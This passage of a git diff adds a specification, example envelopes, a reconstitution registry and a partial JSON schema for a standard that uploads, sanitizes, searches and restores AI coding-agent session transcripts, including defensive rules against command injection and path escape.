+| `source_path` | string | The transcript's original path on the capturing machine, relative to the harness's session root. A Source SHOULD record it. A Reconstitutor uses it in preference to deriving a path from the registry template (6.4.2), which removes any dependence on re-deriving filename components the harness never documented. |
+| `workflow_id` | string or null | For an Exporter session that is part of a multi-agent run, the shared id grouping the run's per-agent envelopes. |
+
+Additional keys are permitted. Consumers MUST tolerate unknown metadata keys.
+
+---
+
+## 5. Transport
+
+### 5.1 Endpoint
+
+Envelopes are uploaded in batches to:
+
+```
+POST /v1/sessions/batch
+```
+
+The request body MUST be:
+
+```json
+{ "envelopes": [ /* one or more session envelopes */ ] }
+```
+
+The wrapper object is REQUIRED. A store MUST NOT accept a bare top-level JSON
+array as a batch body. The wrapper exists so that batch-level fields can be added
+additively (section 8.1); a bare top-level array can never gain one without a
+breaking change, and at the standard level that cost is paid by every consumer at
+once rather than by one application.
+
+### 5.2 Authentication
+
+- The request MUST carry `Authorization: Bearer <token>`.
+- The token MUST be scoped `sessions:write`.
+- Tokens SHOULD be per-satellite principals, so `origin` is attributable to a
+  credential.
+
+### 5.3 Idempotency
+
+- The endpoint MUST deduplicate on the pair `(session_id, content_hash)`.
+- The `content_hash` used for dedup MUST be the store's own, computed at ingest
+  over the captured content (4.2.3). A store MUST NOT dedup on a
+  producer-supplied hash.
+- Re-submitting an envelope with a `(session_id, content_hash)` already present
+  MUST NOT create a duplicate.
+- The response MUST report a per-item outcome of `accepted`, `duplicate`, or
+  `rejected`, and MUST include a reason for `rejected`.
+
+### 5.4 Server-Enforced Sanitization
+
+- The store MUST sanitize every envelope before persisting, regardless of
+  source (section 3.5).
+- Sanitization MUST run even when the producer claims to have pre-redacted.
+- The store MUST NOT persist the pre-sanitization bytes. Sanitization is a
+  security floor, not a view: once blobs replicate to object storage and offsite
+  backup, a retained unsanitized copy is an unbounded secret-exposure surface.
+- Sanitization MUST be confined to the two transformations of 4.3.2.
+
+A future minor version MAY define an opt-in raw-retention profile for stores with
+a stronger security posture. Until such a profile exists, retaining unsanitized
+bytes is non-conformant.
+
+### 5.5 Sanitizer Evolution
+
+A store's sanitization ruleset will change over time, because secret-detection
+patterns improve. This section defines what that costs.
+
+Because `content_hash` is computed over the captured content before sanitization
+(4.2.3), a sanitizer change does NOT change any session's digest. Dedup is
+therefore unaffected by sanitizer evolution, and re-uploading an unchanged session
+still resolves as `duplicate` no matter how many times the ruleset has moved.
+
+A conforming store MUST:
+
+1. Record which sanitizer version produced each stored form, so the set needing
+   re-sanitization is identifiable.
+2. Re-sanitize stored forms when the ruleset changes, so secrets the previous
+   ruleset failed to detect are redacted in already-stored sessions.
+3. Keep `content_hash` unchanged when re-sanitizing. The digest describes captured
+   content, which re-sanitization does not alter.
+
+Re-sanitization is strictly additive in effect: it can redact spans the old
+ruleset missed, but it cannot restore spans the old ruleset already redacted,
+because the original bytes were discarded at ingest (5.4). This is the intended
+trade. A store therefore MUST NOT treat re-sanitization as reproducing what a
+fresh ingest under the new ruleset would have produced; those two results
+legitimately differ, and nothing in this standard depends on them being equal.
+
+The dedup key stays `(session_id, content_hash)`. The sanitizer version MUST NOT
+be added to it, which would let the same session persist once per ruleset
+revision.
+
+---
+
+## 6. Conformance Profiles
+
+A conforming producer implements at least one of the following profiles.
+
+### 6.1 Source (Pull)
+
+A **Source** reads provider transcripts from local disk and produces envelopes.
+A conforming Source MUST:
+
+1. Enumerate the provider's local transcripts.
+2. For each, build a schema-valid envelope (section 4): wrap the transcript in
+   `raw` verbatim (4.3), and fill every REQUIRED header field.
+3. Derive real `started_at` and `last_activity_at` from the transcript (4.2.2).
+4. Omit `content_hash`, or send it as null. A Source MUST NOT send a hash
+   computed over its pre-sanitization bytes and expect it to be honoured; the
+   store computes the authoritative hash over the captured content (4.2.3).
+5. Hand envelopes to an uploader targeting the batch endpoint (section 5).
+
+A conforming Source SHOULD populate the well-known `metadata` fields (4.4) when
+the information is available, and SHOULD pre-redact obvious secrets before
+upload (3.5), while relying on the server for authoritative sanitization.
+
+### 6.2 Exporter (Push)
+
+An **Exporter** constructs envelopes and pushes them to the batch endpoint,
+for runtimes that are ephemeral or remote. A conforming Exporter MUST:
+
+1. Build schema-valid envelopes (section 4), preserving `raw` verbatim (4.3) and
+   filling every REQUIRED header field.
+2. Stamp a correct `origin` (4.2.1), including the environment class
+   (`container` or `workflow` as appropriate).
+3. Derive real timestamps (4.2.2). As with a Source, an Exporter MUST NOT expect
+   a self-computed `content_hash` to be honoured (4.2.3).
+4. Authenticate with a `sessions:write`-scoped token and POST to
+   `/v1/sessions/batch` (section 5), using the `{ "envelopes": [...] }` wrapper
+   (5.1).
+5. SHOULD pre-redact obvious secrets before push (3.5), while relying on the
+   server for authoritative sanitization.
+
+For a multi-agent run, an Exporter MUST emit one envelope PER AGENT and MUST set
+the same `metadata.workflow_id` on every envelope from that run.
+
+### 6.3 Store (Consumer)
+
+A conforming store MUST:
+
+1. Accept envelopes at `/v1/sessions/batch` (section 5), enforcing the scoped
+   token.
+2. Reject envelopes that fail schema validation (section 4), reporting a reason
+   (5.3).
+3. Deduplicate on `(session_id, content_hash)` (5.3).
+4. Sanitize before persisting, unconditionally (5.4).
+5. Persist `raw` such that it remains retrievable verbatim.
+6. Serve the search baseline of section 7.
+
+### 6.4 Reconstitutor (Restore)
+
+A **Reconstitutor** restores a stored session onto a machine so the originating
+harness can resume it natively. It is the inverse of a Source: a Source reads the
+harness's session file from disk into an envelope, a Reconstitutor writes it back.
+
+Reconstitution is **same-harness only**. A session captured from Claude Code is
+restored for Claude Code. Cross-harness restore is out of scope (1.2).
+
+#### 6.4.1 Requirements
+
+A conforming Reconstitutor MUST:
+
+1. Fetch the stored form of an envelope, unmodified (6.3.5).
+2. Resolve the target path, preferring `metadata.source_path` (4.4) when present
+   and otherwise deriving it from the reconstitution registry template (6.4.2)
+   keyed on the envelope's `source_format`. In both cases the relocation rule
+   (6.4.3) applies to the harness-root portion of the path.
+3. Write `raw` to that path byte-for-byte as stored. It MUST NOT reshape,
+   re-encode, or re-serialize the transcript, and MUST NOT rewrite paths or
+   identifiers *inside* the transcript. Only the container path is remapped.
+4. Hand off to the harness's native resume, constructed from the registry's resume
+   descriptor (6.4.2).
+
+A conforming Reconstitutor MUST NOT execute any command string carried in an
+envelope. See 6.4.5.
+
+#### 6.4.2 The Reconstitution Registry
+
+Per-harness restore knowledge lives in a registry shipped with this standard
+(`registry/reconstitution.toml`), keyed by `source_format`. Each entry declares:
+
+| Field | Description |
+|-------|-------------|
+| `path_template` | Where the harness expects the session file, as a function of the working directory and session id, for example `~/.claude/projects/{slug(cwd)}/{session_id}.jsonl`. |
+| `slug_rule` | How the harness derives its directory slug from a working directory path, since this is harness-specific and not guessable. |
+| `resume` | A **structured descriptor** of how to resume: the program and its argument template, for example program `claude` with args `["--resume", "{session_id}"]`. Never a concatenated shell string. |
+| `serialization` | How `raw` is written back to disk, for example `jsonl` or `json`. |
+
+The registry is **informative and separately versioned**. It is not normative spec
+text: providers change their on-disk layout on their own schedule, and a registry
+entry going stale MUST NOT be treated as this standard changing. Correcting or
+adding an entry is not a version bump of the envelope (8.2).
+
+Registry entries describe *where a harness keeps its file*, not what is inside it.
+This standard still never parses `raw` (1.2).
+
+#### 6.4.3 The Relocation Rule
+
+The stored `path_template` is a function of the *capturing* machine's working
+directory. On a different machine the same repository usually lives somewhere
+else, so a Reconstitutor MUST recompute the target path against the local
+location of the repository rather than reusing the captured path.
+
+- The Reconstitutor MUST locate the repository locally, using `metadata.repo` and
+  `metadata.git_remote` as hints.
+- If the repository is absent locally, the Reconstitutor SHOULD offer to clone it
+  from `metadata.git_remote`.
+- If the target path cannot be resolved, the Reconstitutor MUST fail loudly. It
+  MUST NOT write the transcript to a guessed or fallback location, which would
+  produce a session the harness cannot find.
+- Absolute paths *inside* the transcript MUST be left alone (6.4.1.3). They may be
+  wrong on the new machine; that is the harness's business, and rewriting them
+  would break byte-fidelity of the stored transcript.
+
+#### 6.4.4 Round-Trip Fitness Function
+
+Reconstitution makes the verbatim-`raw` requirement (4.3) testable rather than
+merely asserted. Two round trips are defined.
+
+**Producer round trip (byte-exact, REQUIRED for a Source).** For a Source paired
+with a Reconstitutor for the same `source_format`, reconstituting a captured
+session MUST reproduce the original session file byte-for-byte:
+
+```
+reconstitute(capture(session)) == session
+```
+
+This runs entirely producer-side, before the store and therefore before
+sanitization, so it is exactly byte-equal. A Source that fails it is reshaping
+`raw` and is non-conformant.
+
+**Cross-machine round trip (REQUIRED for a Reconstitutor).** Capture on machine A,
+reconstitute on machine B at a different local path, and the harness's native
+resume MUST succeed with session context intact.
+
+Equality here is against the **stored form**, not the original bytes: redacted
+spans and stripped NULs (4.3.2) are expected and MUST NOT be treated as failures.
+A resumed session carrying inert redaction placeholders is a conformant resume; a
+resumed agent re-acquires live credentials from its own environment. "Lossless
+resume" in this standard means lossless relative to the stored form (2.9).
+
+#### 6.4.5 Security
+
+Resume descriptors come from the standard's registry (6.4.2), never from the
+envelope. This is deliberate. Push producers are untrusted (10.3), and an envelope
+field carrying a resume command would let a producer specify a command that a
+Reconstitutor then executes on the restoring machine, which is remote code
+execution by design.
+
+Accordingly:
+
+- A Reconstitutor MUST source resume descriptors only from the registry.
+- A Reconstitutor MUST ignore any envelope field purporting to carry a path
+  template, resume command, or executable string.
+- Resume descriptors MUST be structured (program plus argument list) and MUST be
+  invoked without a shell, so that values interpolated from envelope data cannot
+  inject additional commands.
+- `session_id` is interpolated into resume arguments and into path templates, and
+  originates from an untrusted producer. A Reconstitutor MUST validate it against
+  the registry entry's `session_id_pattern` before use.
+
+`metadata.source_path` (4.4) is likewise untrusted producer input that is used to
+choose a filesystem write location. A Reconstitutor MUST therefore:
+
+- Treat `source_path` as relative to the harness session root, and reject any
+  value that is absolute or that escapes that root after normalization. A value
+  containing `..` segments, a leading `/`, a drive prefix, or a symlink that
+  resolves outside the root MUST be rejected.
+- Reject rather than sanitize. A `source_path` that does not resolve safely
+  indicates a malformed or hostile envelope, and silently rewriting it to
+  something "safe" would restore a session to a location the harness will not
+  find (6.4.3).
+- Fall back to the registry template when `source_path` is rejected, and record
+  that it did.
+
+Without this, a single malicious envelope would let any push producer write
+arbitrary file content to an arbitrary path on any machine that reconstitutes it.
+
+### 6.5 Conformance Checklist
+
+An implementation is **conformant** with this standard if it satisfies every item
+for each profile it claims.
+
+**Producer (Source or Exporter)**
+
+- [ ] Every emitted envelope is schema-valid (section 4).
+- [ ] `raw` is preserved verbatim, never flattened or normalized (4.3).
+- [ ] `started_at` and `last_activity_at` are real session times (4.2.2).
+- [ ] `origin` is correct and complete (4.2.1).
+- [ ] No self-computed `content_hash` is relied upon (4.2.3).
+- [ ] Batches use the `{ "envelopes": [...] }` wrapper (5.1).
+- [ ] For a Source paired with a Reconstitutor: the byte-exact producer round trip
+      passes (6.4.4).
+
+**Store**
+
+- [ ] The batch endpoint enforces the scoped token, requires the wrapper, and
+      dedups on its own hash (section 5).
+- [ ] The store sanitizes before persisting, unconditionally, and persists no
+      pre-sanitization bytes (5.4).
+- [ ] Sanitization is confined to redaction and NUL stripping (4.3.2).
+- [ ] `content_hash` is computed at ingest over the captured content, using the
+      canonical hash input, and producer-supplied hashes are overwritten (4.2.3).
+- [ ] Sanitizer version is recorded per stored form, and a ruleset change
+      triggers re-sanitization without changing `content_hash` (5.5).
+- [ ] `raw` type and reconstitutability are consistent: a `source_format` in the
+      reconstitution registry carries a string `raw` (4.3.1).
+- [ ] `raw` remains retrievable in its stored form (6.3.5).
+- [ ] The store supports the metadata and lexical search baseline (section 7).
+
+**Reconstitutor**
+
+- [ ] Target paths resolve through the registry and the relocation rule
+      (6.4.2, 6.4.3).
+- [ ] The transcript is written byte-for-byte as stored; nothing inside it is
+      rewritten (6.4.1).
+- [ ] Unresolvable target paths fail loudly rather than falling back (6.4.3).
+- [ ] Resume descriptors come only from the registry, are structured, and are
+      invoked without a shell (6.4.5).
+- [ ] `session_id` is validated against the registry pattern, and
+      `metadata.source_path` is rejected if absolute or escaping the harness root
+      (6.4.5).
+- [ ] The cross-machine round trip passes (6.4.4).
+
+---
+
+## 7. Search Expectations
+
+### 7.1 Metadata and Lexical Search (Baseline, REQUIRED)
+
+A conforming store MUST support querying and filtering sessions by `metadata`
+fields, not only full-text over content. At minimum, a store MUST support
+filtering by `origin.host`, `origin.environment`, `agent`, and the well-known
+metadata fields it received (for example `repo`, `project`, `model`, `tags`).
+Representative queries a store MUST be able to answer include:
+
+- "All sessions from repo X" (`metadata.repo`).
+- "Everything from `origin.environment = vps`."
+- "Everything by `agent = Codex`."
+
+A conforming store MUST also support lexical (full-text) search over session
+content. Because `raw` is opaque to the standard, this search operates over a
+server-derived view (7.3), which is allowed to be lossy.
+
+### 7.2 Semantic Search (OPTIONAL)
+
+Semantic and embedding search over sessions is explicitly OPTIONAL and
+cost-sensitive. A store MAY offer it. This standard never requires it. Absence of
+semantic search MUST NOT be treated as non-conformance.
+
+### 7.3 Server-Derived Normalization
+
+Any normalized, searchable view over session content is built by the store,
+best-effort, using per-provider parsers keyed on `source_format` (4.2). This
+view:
+
+- MAY be lossy, because `raw` (4.3) is always ground truth.
+- MAY be rebuilt, improved, or extended with new parsers at any time, without
+  changing this standard and without producers re-uploading anything.
+- Is NOT part of the client contract. Producers commit to nothing
+  provider-specific; they only promise a valid envelope and a verbatim `raw`.
+
+---
+
+## 8. Versioning and Evolution
+
+### 8.1 Envelope Version
+
+`scs_version` is SemVer. Within a major version, changes MUST be additive only:
+
+- New OPTIONAL header or metadata fields.
+- New `source_format` values.
+- New `origin.environment` values.
+
+A change that removes a field, renames a field, or narrows a type MUST bump the
+major version, and MUST be negotiated at the batch endpoint.
+
+### 8.2 New Providers Never Bump the Version
+
+Adding support for a new provider MUST NOT require a version bump. A new provider
+is onboarded by:
+
+1. Choosing a new `source_format` value.
+2. Wrapping the provider's transcript in `raw` verbatim.
+3. Optionally adding a server-side parser (section 7.3) keyed on that
+   `source_format`.
+4. Optionally adding a reconstitution registry entry (6.4.2) keyed on that
+   `source_format`, if the provider's sessions should be resumable.
+
+Adding, correcting, or removing a reconstitution registry entry is likewise NOT a
+version bump of the envelope. The registry is versioned independently (6.4.2).
+
+### 8.3 Consumer Tolerance
+
+Consumers MUST tolerate unknown `agent` strings, unknown `source_format` values,
+unknown `origin.environment` values, and unknown `metadata` keys, so that
+additive evolution does not break existing stores.
+
+---
+
+## 9. Reserved and Deferred (Informative)
+
+- **`parent_session_id` derivation** - The field is reserved in v1. Deriving the
+  parent for a subagent session is a later phase.
+- **Large-`raw` referencing** - The inline-versus-object-store threshold for
+  `raw` (4.3) is deferred to implementations.
+- **Raw-retention profile** - An opt-in profile permitting stores with a stronger
+  security posture to retain pre-sanitization bytes (5.4). Not defined here; until
+  it exists, retention is non-conformant.
+- **Cross-harness reconstitution** - Out of scope by decision, not deferral
+  (1.2).
+- **Derived-view schema** - A normalized projection over `raw` (turns, tool
+  calls, errors, token counts) would let analysis tooling be written once and run
+  against any conformant store. It is a candidate for a future substandard, and it
+  MUST remain explicitly lossy and non-load-bearing so the envelope contract stays
+  as section 7.3 defines it.
+
+---
+
+## 10. Security Considerations
+
+### 10.1 Secrets in Transcripts
+
+Raw transcripts often contain pasted secrets. Producers SHOULD pre-redact, but
+the store MUST sanitize unconditionally before persisting (section 5.4). Client
+redaction MUST NOT be relied upon as the only defense.
+
+### 10.2 Token Scope
+
+Upload tokens MUST be scoped `sessions:write` and SHOULD be per-satellite
+principals so uploads are attributable to a credential (section 5.2). Tokens MUST
+NOT be committed to version control.
+
+### 10.3 Untrusted Producers
+
+Push producers (containers, workflows) are effectively untrusted. The store MUST
+treat every envelope as untrusted input: validate against the schema, sanitize,
+and never execute or interpret `raw` beyond best-effort parsing for search.
+
+---
+
+## 11. Informative: Reference Implementation
+
+The canonical envelope types, their validation, and the reconstitution registry
+ship in THIS package as the `apss-v1-0004-session-capture` crate. Consumers depend
+on that crate rather than reimplementing the envelope, so drift from this standard
+surfaces as a build or test failure (1.3).
+
+The behavioural reference implementation lives in the SeshMagic repository, NOT
+here. It comprises:
+
+- Source implementations for Claude, Codex, and Cursor (the pull half).
+- A reference exporter and CLI for the push half: batching, retry, auth, and
+  origin-stamping.
+- The server-side sanitizer and the per-provider parsers that build the
+  searchable view (section 7.3).
+- The Reconstitutor client (section 6.4): path resolution, relocation, and native
+  resume handoff.
+
+Target adopters are SeshMagic (Sources, the reference exporter, the store, and the
+Reconstitutor), syntropic137 workflows (Exporter, one envelope per agent grouped
+by `workflow_id`), and agentic-primitives `providers/workspaces` (Exporter,
+embedded in the workspace image).
+
+---
+
+## 12. References
+
+- [RFC 2119: Key words for use in RFCs](https://datatracker.ietf.org/doc/html/rfc2119)
+- [RFC 3339: Date and Time on the Internet: Timestamps](https://datatracker.ietf.org/doc/html/rfc3339)
+- [Semantic Versioning](https://semver.org/)
+- [CloudEvents Specification](https://cloudevents.io/)
+
+---
+
+*End of Specification*

--- a/standards/v1/APS-V1-0004-session-capture/examples/README.md
+++ b/standards/v1/APS-V1-0004-session-capture/examples/README.md
@@ -1,0 +1,48 @@
+# Session Capture Standard Examples
+
+This directory demonstrates the two producing conformance profiles of
+APS-V1-0004. The third profile, Reconstitutor, consumes stored envelopes rather
+than producing them; its per-harness knowledge lives in
+[`../registry/reconstitution.toml`](../registry/reconstitution.toml).
+
+## Files
+
+| File | Profile | What it shows |
+|------|---------|---------------|
+| `claude-source-envelope.json` | Source (pull) | A single valid session envelope produced by reading a Claude Code transcript from local disk. `raw` holds the provider transcript verbatim; the header fields and `metadata` power backup and search. |
+| `workflow-exporter-batch.json` | Exporter (push) | The body of `POST /v1/sessions/batch` for one syntropic137 multi-agent run: one envelope per agent, grouped by a shared `metadata.workflow_id`. |
+
+## Validating an envelope against the schema
+
+Every example envelope is valid against
+[`../schemas/session-envelope.schema.json`](../schemas/session-envelope.schema.json).
+Only the header fields and `raw` are required; `metadata` is optional and
+freeform. Any JSON Schema validator works, for example:
+
+```bash
+# Using check-jsonschema (pip install check-jsonschema)
+check-jsonschema --schemafile ../schemas/session-envelope.schema.json \
+  claude-source-envelope.json
+```
+
+The crate in this package (`src/lib.rs`) also parses and structurally validates
+envelopes; see [`../tests/`](../tests/).
+
+## Key points the examples illustrate
+
+- **`raw` is opaque and verbatim.** The examples never flatten or normalize the
+  provider transcript. A Claude envelope and a Codex envelope differ only in
+  `source_format` and the shape inside `raw`; the envelope header is identical.
+- **Metadata is first-class for search.** `repo`, `origin.environment`, `agent`,
+  `model`, and `tags` are what a store filters and queries on. See section 7 of
+  the spec.
+- **Idempotency.** The batch endpoint dedups on `(session_id, content_hash)`, so
+  re-sends are safe. Note that **no example carries `content_hash`**: these model
+  envelopes in flight, and producers do not compute the hash. The store derives it
+  at ingest over the captured content and overwrites anything a producer sent
+  (spec 4.2.3). A test enforces that the examples stay this way.
+- **`raw` is a verbatim string.** Both `source_format` values here appear in the
+  reconstitution registry, so their transcripts MUST be captured as exact bytes
+  rather than parsed into objects (spec 4.3.1). Parsing would forfeit resume.
+- **Origin attribution.** The Source example is `origin.environment = local`;
+  the Exporter examples are `origin.environment = workflow`.

--- a/standards/v1/APS-V1-0004-session-capture/examples/claude-source-envelope.json
+++ b/standards/v1/APS-V1-0004-session-capture/examples/claude-source-envelope.json
@@ -1,0 +1,25 @@
+{
+  "scs_version": "1.0",
+  "origin": {
+    "host": "macbook-neural",
+    "environment": "local"
+  },
+  "agent": "ClaudeCode",
+  "source_format": "claude-jsonl-v1",
+  "session_id": "019973e4-58a9-7b83-9f21-2b6c4d0a1e77",
+  "parent_session_id": null,
+  "started_at": "2026-05-02T14:03:11Z",
+  "last_activity_at": "2026-05-02T15:20:44Z",
+  "metadata": {
+    "repo": "AgentParadise/agent-paradise-standards-system",
+    "git_remote": "https://github.com/AgentParadise/agent-paradise-standards-system.git",
+    "cwd": "/Users/neural/Code/apss",
+    "project": "apss",
+    "model": "claude-opus-4-8",
+    "tags": ["standards", "authoring"],
+    "message_count": 42,
+    "workflow_id": null,
+    "source_path": "-Users-neural-Code-apss/019973e4-58a9-7b83-9f21-2b6c4d0a1e77.jsonl"
+  },
+  "raw": "{\"type\":\"user\",\"message\":{\"role\":\"user\",\"content\":[{\"type\":\"text\",\"text\":\"...\"}]}}\n{\"type\":\"assistant\",\"message\":{\"role\":\"assistant\",\"content\":[{\"type\":\"text\",\"text\":\"...\"}]}}\n"
+}

--- a/standards/v1/APS-V1-0004-session-capture/examples/workflow-exporter-batch.json
+++ b/standards/v1/APS-V1-0004-session-capture/examples/workflow-exporter-batch.json
@@ -1,0 +1,51 @@
+{
+  "note": "Exporter (push) profile: the body of POST /v1/sessions/batch for one syntropic137 multi-agent run. One envelope PER AGENT; the run is grouped by a shared metadata.workflow_id. Sent with Authorization: Bearer <sessions:write token>. These envelopes are IN FLIGHT, so none carries content_hash: the store computes it at ingest (spec 4.2.3).",
+  "envelopes": [
+    {
+      "scs_version": "1.0",
+      "origin": {
+        "host": "syn137-runner-7",
+        "environment": "workflow"
+      },
+      "agent": "Codex",
+      "source_format": "codex-turns-v1",
+      "session_id": "019e9515-c90c-74b1-9dd9-d5961364264a",
+      "parent_session_id": null,
+      "started_at": "2026-05-02T09:00:02Z",
+      "last_activity_at": "2026-05-02T09:04:51Z",
+      "metadata": {
+        "repo": "owner/service",
+        "project": "service",
+        "model": "gpt-5.5",
+        "tags": ["ci", "planner"],
+        "message_count": 12,
+        "workflow_id": "run-4820",
+        "source_path": "2026/05/02/rollout-2026-05-02T09-00-02-019e9515-c90c-74b1-9dd9-d5961364264a.jsonl"
+      },
+      "raw": "{\"type\":\"turn\",\"role\":\"user\",\"content\":\"plan the change\"}\n{\"type\":\"turn\",\"role\":\"assistant\",\"content\":\"...\"}\n"
+    },
+    {
+      "scs_version": "1.0",
+      "origin": {
+        "host": "syn137-runner-7",
+        "environment": "workflow"
+      },
+      "agent": "ClaudeCode",
+      "source_format": "claude-jsonl-v1",
+      "session_id": "019e9520-4b7a-7c31-8ef0-1a2b3c4d5e6f",
+      "parent_session_id": null,
+      "started_at": "2026-05-02T09:05:10Z",
+      "last_activity_at": "2026-05-02T09:19:37Z",
+      "metadata": {
+        "repo": "owner/service",
+        "project": "service",
+        "model": "claude-opus-4-8",
+        "tags": ["ci", "implementer"],
+        "message_count": 48,
+        "workflow_id": "run-4820",
+        "source_path": "-workspace-service/019e9520-4b7a-7c31-8ef0-1a2b3c4d5e6f.jsonl"
+      },
+      "raw": "{\"type\":\"user\",\"message\":{\"role\":\"user\",\"content\":[{\"type\":\"text\",\"text\":\"implement the plan\"}]}}\n{\"type\":\"assistant\",\"message\":{\"role\":\"assistant\",\"content\":[{\"type\":\"text\",\"text\":\"...\"}]}}\n"
+    }
+  ]
+}

--- a/standards/v1/APS-V1-0004-session-capture/registry/reconstitution.toml
+++ b/standards/v1/APS-V1-0004-session-capture/registry/reconstitution.toml
@@ -1,0 +1,81 @@
+# Reconstitution registry (APS-V1-0004 section 6.4.2)
+#
+# Maps `source_format` to the knowledge a Reconstitutor needs to write a stored
+# transcript back to disk and hand off to the harness's native resume.
+#
+# THIS FILE IS INFORMATIVE AND SEPARATELY VERSIONED.
+#
+# It is not normative specification text. Harnesses change their on-disk layout
+# on their own schedule; an entry going stale is a registry correction, never a
+# change to the envelope contract. Adding, correcting, or removing an entry is
+# NOT a version bump of `scs_version` (section 8.2).
+#
+# Entries describe WHERE a harness keeps its session file, never what is inside
+# it. The standard still never parses `raw` (section 1.2).
+#
+# SECURITY (section 6.4.5): `resume.program` and `resume.args` are a structured
+# descriptor, never a shell string. A Reconstitutor MUST invoke them without a
+# shell, and MUST validate interpolated values (notably `session_id`, which comes
+# from an untrusted producer) against `session_id_pattern` before use. Resume
+# descriptors MUST come from this registry and never from an envelope field.
+
+registry_version = "1.0.0"
+
+# ---------------------------------------------------------------------------
+# Claude Code
+# ---------------------------------------------------------------------------
+[claude-jsonl-v1]
+harness = "ClaudeCode"
+description = "Claude Code writes one JSONL transcript per session, in a directory derived from the working directory."
+path_template = "~/.claude/projects/{slug}/{session_id}.jsonl"
+serialization = "jsonl"
+session_id_pattern = "^[A-Za-z0-9][A-Za-z0-9_-]{0,127}$"
+
+[claude-jsonl-v1.slug_rule]
+# Claude Code derives its project directory from the absolute cwd by replacing
+# path separators and dots with hyphens, for example:
+#   /Users/me/Code/my.app  ->  -Users-me-Code-my-app
+source = "cwd_absolute"
+replace = [["/", "-"], [".", "-"]]
+
+[claude-jsonl-v1.resume]
+program = "claude"
+args = ["--resume", "{session_id}"]
+cwd = "{repo_root}"
+
+# ---------------------------------------------------------------------------
+# Codex CLI
+# ---------------------------------------------------------------------------
+[codex-turns-v1]
+harness = "Codex"
+description = "Codex CLI writes one rollout file per session into a year/month/day partitioned tree, with the session start timestamp embedded in the filename."
+# Verified against a live ~/.codex/sessions tree, for example:
+#   ~/.codex/sessions/2026/06/04/rollout-2026-06-04T17-01-33-019e9515-c90c-74b1-9dd9-d5961364264a.jsonl
+# Date components and the filename timestamp both derive from `started_at`.
+path_template = "~/.codex/sessions/{started_at:%Y}/{started_at:%m}/{started_at:%d}/rollout-{started_at:%Y-%m-%dT%H-%M-%S}-{session_id}.jsonl"
+serialization = "jsonl"
+session_id_pattern = "^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$"
+# The timezone Codex uses for the filename timestamp is not documented and is not
+# safely inferable from the filename alone. A Reconstitutor SHOULD therefore
+# prefer `metadata.source_path` (spec 4.4) when the producer recorded it, and fall
+# back to this template only when it is absent.
+prefer_source_path = true
+
+[codex-turns-v1.slug_rule]
+# Codex partitions by date rather than by working directory, so no cwd-derived
+# slug exists. The relocation rule (6.4.3) still applies to `resume.cwd`.
+source = "none"
+
+[codex-turns-v1.resume]
+program = "codex"
+args = ["resume", "{session_id}"]
+cwd = "{repo_root}"
+
+# ---------------------------------------------------------------------------
+# Cursor
+# ---------------------------------------------------------------------------
+# Cursor stores sessions in a SQLite database rather than as discrete per-session
+# files, so a stored transcript cannot be written back as a standalone file and
+# resumed. Cursor sessions are captured and searchable, but NOT reconstitutable.
+# Absence from this registry is how a Reconstitutor learns that: it MUST fail
+# loudly on an unknown `source_format` (6.4.3) rather than guess a path.

--- a/standards/v1/APS-V1-0004-session-capture/schemas/session-envelope.schema.json
+++ b/standards/v1/APS-V1-0004-session-capture/schemas/session-envelope.schema.json
@@ -1,0 +1,136 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "urn:apss:schema:aps-v1-0004:session-envelope:1.0.0",
+  "title": "Session Envelope",
+  "description": "Schema for a single Session Capture Standard (SCS) envelope per APS-V1-0004 section 4. A thin, universal header wrapped around a provider-native transcript preserved verbatim in `raw`. Only the header fields and `raw` are required; `metadata` is freeform and non-load-bearing. `content_hash` is computed by the store at ingest over the captured content, never by the producer (section 4.2.3); it is absent in an envelope in flight and present once stored, so this schema validates both states and does not mark it required.",
+  "type": "object",
+  "required": [
+    "scs_version",
+    "origin",
+    "agent",
+    "source_format",
+    "session_id",
+    "started_at",
+    "last_activity_at",
+    "raw"
+  ],
+  "additionalProperties": true,
+  "properties": {
+    "scs_version": {
+      "type": "string",
+      "description": "SemVer of the envelope schema. Additive-only within a major.",
+      "pattern": "^[0-9]+\\.[0-9]+$"
+    },
+    "origin": {
+      "$ref": "#/$defs/Origin"
+    },
+    "agent": {
+      "type": "string",
+      "description": "The producing runtime. Known values include ClaudeCode, Codex, Cursor, Gemini; any provider-specific string is permitted.",
+      "minLength": 1
+    },
+    "source_format": {
+      "type": "string",
+      "description": "Provenance tag for `raw`: identifies how a server-side parser should read it (for example claude-jsonl-v1). New providers add a value here with zero schema change.",
+      "minLength": 1
+    },
+    "session_id": {
+      "type": "string",
+      "description": "Identifier for the session, stable per source. Half of the idempotency key.",
+      "minLength": 1
+    },
+    "parent_session_id": {
+      "type": ["string", "null"],
+      "description": "For a subagent session, the id of its parent session. Reserved in v1; filled in a later phase."
+    },
+    "started_at": {
+      "type": "string",
+      "format": "date-time",
+      "description": "Real session start time (RFC3339), derived from the transcript, not the capture time."
+    },
+    "last_activity_at": {
+      "type": "string",
+      "format": "date-time",
+      "description": "Real time of the last activity in the session (RFC3339)."
+    },
+    "content_hash": {
+      "type": ["string", "null"],
+      "description": "Hash over the CAPTURED CONTENT, computed by the store at ingest before sanitizing (section 4.2.3). ABSENT OR NULL in an envelope in flight from a producer; PRESENT in a stored envelope. Within scs_version 1.x the algorithm MUST be SHA-256 and the digest MUST be lowercase hexadecimal, because dedup compares these as strings and equal digest bytes in different cases would not match.",
+      "pattern": "^sha256:[0-9a-f]{64}$"
+    },
+    "metadata": {
+      "description": "Freeform, non-load-bearing metadata. Explicit null is accepted and equivalent to omission, so a producer that always emits the key does not become non-conformant.",
+      "oneOf": [{ "$ref": "#/$defs/Metadata" }, { "type": "null" }]
+    },
+    "raw": {
+      "description": "The provider-native transcript, preserved verbatim. Opaque to the standard. A string carries the transcript's exact bytes and is the ONLY shape that supports byte-exact reconstitution, so it is required for any source_format in the reconstitution registry (section 4.3.1). Object and array shapes are valid but not reconstitutable. Scalars (number, boolean, null) are not a transcript and are rejected.",
+      "type": ["object", "array", "string"]
+    }
+  },
+  "$defs": {
+    "Origin": {
+      "type": "object",
+      "description": "Where the envelope came from, so a multi-source corpus stays attributable.",
+      "required": ["host", "environment"],
+      "additionalProperties": true,
+      "properties": {
+        "host": {
+          "type": "string",
+          "description": "Human-meaningful host identity, for example macbook-neural or the VPS hostname.",
+          "minLength": 1
+        },
+        "environment": {
+          "type": "string",
